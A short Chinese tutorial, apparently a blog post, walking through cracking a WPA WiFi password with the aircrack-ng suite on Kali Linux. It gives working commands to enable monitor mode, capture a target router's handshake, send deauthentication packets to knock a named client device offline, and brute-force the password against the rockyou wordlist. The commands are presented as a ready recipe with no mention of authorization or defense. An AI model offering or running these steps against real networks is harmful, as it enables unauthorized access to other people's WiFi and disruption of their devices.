- 安装Kali Linux到U盘中,很方便。
Kali Linux自带的rockyou字典 /usr/share/wordlists/rockyou.txt.gz。
使用前先解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz首先断开连接的wifi,命令必须在root权限下执行,不然会有commond not found的报错。
在终端中执行:airmon-ng- 开启无线网卡的监控模式,wlan0是网卡的名字
airmon-ng start wlan0
执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看。
- 开启无线网卡的监控模式,wlan0是网卡的名字
- 查看wifi网络
airodump-ng wlan0mon
记住要破解wifi的频道号和BSSID。 - 抓取握手包
使用网卡的监听模式抓取周围的无线网络数据包。我们需要的是包含密码的握手包。
开始抓包:
airodump-ng -c 6 –bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon
参数解释:
-c 指定频道号
–bssid 指定路由器bssid
-w 指定抓取的数据包保存位置 - 强制连接到wifi的设备重新连接路由器
给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。
aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备。从上图(4)可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。
打开新终端执行:
aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
参数解释:
-0指定发送反认证包的个数
-a指定无线路由器BSSID
-c指定强制断开的设备
如果成功:
右上角会提示hand包找到。 - 停止监听模式。
airmon-ng stop wlan0mon - 跑字典开始解密码
aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
参数解释:
-a2代表WPA的握手包
-b指定要破解的wifi BSSID。
-w指定字典文件
最后是抓取的包
无线网络破解 aircrack的使用
最新推荐文章于 2024-07-25 08:56:49 发布